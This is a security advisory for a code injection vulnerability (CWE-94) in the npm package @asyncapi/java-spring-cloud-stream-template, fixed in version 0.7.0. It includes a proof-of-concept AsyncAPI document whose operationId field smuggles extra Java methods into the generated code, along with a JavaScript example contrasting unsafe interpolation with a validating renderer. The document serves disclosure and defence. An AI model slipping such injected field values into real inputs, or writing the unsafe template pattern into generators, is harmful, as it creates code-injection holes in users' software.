GHSA-xj6r-2jpm-qvxp

Source
https://github.com/advisories/GHSA-xj6r-2jpm-qvxp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-xj6r-2jpm-qvxp/GHSA-xj6r-2jpm-qvxp.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-xj6r-2jpm-qvxp
Published
2021-08-25T14:45:52Z
Modified
2023-11-01T04:55:54.738884Z
Severity
  • 8.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Summary
Code injection issue for java-spring-cloud-stream-template
Details

The following was initially reported by @jonaslagoni:

Given the following command: ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output

With the following AsyncAPI document:

{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas" : {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": {
            "type": "string"
          }
        }
      }
    }
  }
}

Which changes the following output:

...
  @Bean
  public Consumer<CustomClass> test() {
    // Add business logic here.
    return null;
  }
...

To

...
  @Bean
  public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
  public Consumer<CustomClass> someothername() {
    // Add business logic here.
    return null;
  }
...
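As an added illustration (not the template's own code, which this advisory does not show), the following JavaScript models the unsafe string interpolation the report describes beside a hardened renderer that accepts only a plain Java identifier as the method name; the renderer functions, the identifier check and the method-count helper are hypothetical names chosen here.

```javascript
// Added example, not code from @asyncapi/java-spring-cloud-stream-template.
// A Java identifier: letter, underscore or $ followed by letters, digits, _ or $.
const JAVA_IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Reserved words look like identifiers but cannot be method names.
const JAVA_RESERVED = new Set([
  'abstract', 'assert', 'boolean', 'break', 'byte', 'case', 'catch', 'char',
  'class', 'const', 'continue', 'default', 'do', 'double', 'else', 'enum',
  'extends', 'final', 'finally', 'float', 'for', 'goto', 'if', 'implements',
  'import', 'instanceof', 'int', 'interface', 'long', 'native', 'new', 'package',
  'private', 'protected', 'public', 'return', 'short', 'static', 'strictfp',
  'super', 'switch', 'synchronized', 'this', 'throw', 'throws', 'transient',
  'try', 'void', 'volatile', 'while', 'true', 'false', 'null',
]);

function isSafeJavaMethodName(name) {
  return typeof name === 'string' && JAVA_IDENTIFIER.test(name) && !JAVA_RESERVED.has(name);
}

// Vulnerable shape: the operationId is spliced verbatim into Java source,
// so a value containing braces and a second signature becomes extra code.
function renderConsumerUnsafe(operationId, payloadType) {
  return `  @Bean\n  public Consumer<${payloadType}> ${operationId}() {\n` +
         `    // Add business logic here.\n    return null;\n  }`;
}

// Hardened shape: refuse to render unless both names are plain identifiers.
function renderConsumerSafe(operationId, payloadType) {
  for (const value of [operationId, payloadType]) {
    if (!isSafeJavaMethodName(value)) {
      throw new Error(`refusing to render non-identifier: ${JSON.stringify(value)}`);
    }
  }
  return renderConsumerUnsafe(operationId, payloadType);
}

// Review-time check: a single operationId must yield exactly one method.
function countMethodDeclarations(javaSource) {
  return (javaSource.match(/public\s+Consumer<\w+>\s+\w+\s*\(/g) || []).length;
}

// Constructed input: the operationId from the report above, and a benign one.
const INJECTED_OPERATION_ID =
  'test() { System.out.println("injected"); return test(0); }\n public Consumer<CustomClass> someothername';
const BENIGN_OPERATION_ID = 'test';
```

Running `countMethodDeclarations` over generated sources is a cheap way to flag a template whose output grew an unexpected method from one operation.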
Database specific
{
    "nvd_published_at": "2021-08-11T18:15:00Z",
    "github_reviewed_at": "2021-08-24T18:50:59Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}

Affected packages

npm / @asyncapi/java-spring-cloud-stream-template

Package

Name
@asyncapi/java-spring-cloud-stream-template
Purl
pkg:npm/%40asyncapi/java-spring-cloud-stream-template

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
0.7.0

Database specific

{
    "last_known_affected_version_range": "<= 0.6.9"
}